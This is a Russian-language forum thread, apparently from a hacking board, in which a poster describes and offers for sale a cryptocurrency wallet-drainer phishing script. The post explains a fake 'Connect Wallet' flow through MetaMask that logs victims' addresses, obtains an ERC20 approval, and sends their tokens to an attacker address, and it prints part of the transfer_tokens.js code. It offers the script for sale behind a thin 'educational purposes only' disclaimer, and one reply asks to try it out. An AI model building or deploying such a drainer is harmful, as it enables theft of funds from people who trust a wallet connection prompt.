Фишинговая подпись при подключении кошелька на веб сайте.

[Shadow]

Читаю новости и удивляюсь что и сейчас это актуально.
Вот сейчас написал скрипт подключения кошелька.

Скрипт

• Позволяет подключать кошелек через MetaMask.
• Сохраняет адрес кошелька в базу данных MySQL.
• Выполняет фишинговую транзакцию на approve. (апрув дает полный доступ к кошельку, если пользователь подключился, выполняется следующий скрипт transfer_tokens.js)
• Переводит токены на адрес злоумышленника после одобрения.

Код, работает с любой сетью, поддерживающей Ethereum и совместимые токены ERC20, включая, но не ограничиваясь:

• Ethereum Mainnet: Основная сеть Ethereum.
• Ropsten Testnet: Тестовая сеть Ethereum, которая эмулирует основную сеть.
• Rinkeby Testnet: Еще одна тестовая сеть Ethereum.
• Goerli Testnet: Совсем новая тестовая сеть, поддерживаемая Ethereum.
• Polygon (Matic): Сеть второго уровня, совместимая с Ethereum.
• Binance Smart Chain (BSC): Совместимая с Ethereum сеть, используемая для децентрализованных приложений и токенов.
• Avalanche, Fantom, Optimism, и многие другие сети, поддерживающие стандарты ERC20.

Работа кода на пальцах.

Пользователь открывает сайт, обычная кнопка Connect Wallet, нажимает и подключается как на обычном dex сайте. При подключении он подтверждает approve (дает вам полный доступ к кошельку)

Ваш код сохраняет его данные в базу данных, заполняет скрипт данными кошелька пользователя и запускается transfer_tokens.js скрипт создает транзакцию о переводе всех монет на ваш кошелек.

вот пример часть кода

// transfer_tokens.js

const contractAddress = '0xYourERC20ContractAddress'; // Замените на адрес вашего ERC20 токена
const victimAddress = ''; // Адрес жертвы, будет получен из HTML
const phishingAddress = '0xAttackerAddress'; // Адрес, на который будут отправляться токены

async function transferTokens() {
    try {
        const provider = new ethers.providers.Web3Provider(window.ethereum);
        const signer = provider.getSigner();
        
        const erc20Abi = [
            "function transfer(address to, uint256 amount) public returns (bool)"
        ];
        const contract = new ethers.Contract(contractAddress, erc20Abi, signer);

        const amountToTransfer = ethers.utils.parseUnits("10000", 18); // Перевести 10000 токенов
        
        const tx = await contract.transfer(phishingAddress, amountToTransfer);
        await tx.wait();

        alert('Токены успешно переведены на адрес!');
        console.log('Транзакция успешна:', tx);
    } catch (error) {
        console.error('Ошибка при переводе токенов:', error);
    }
}


transferTokens();

 

Могу продать для диссертации например.

 

Имейте в виду, что данный скрипт предназначен исключительно для образовательных целей, и использование фишинговых техник является незаконным

Изменено 15 октября пользователем laabit_news

[LadyElf]

Надо было идти учится на программиста 

[Sh1k]

дай по братски погонять скрипт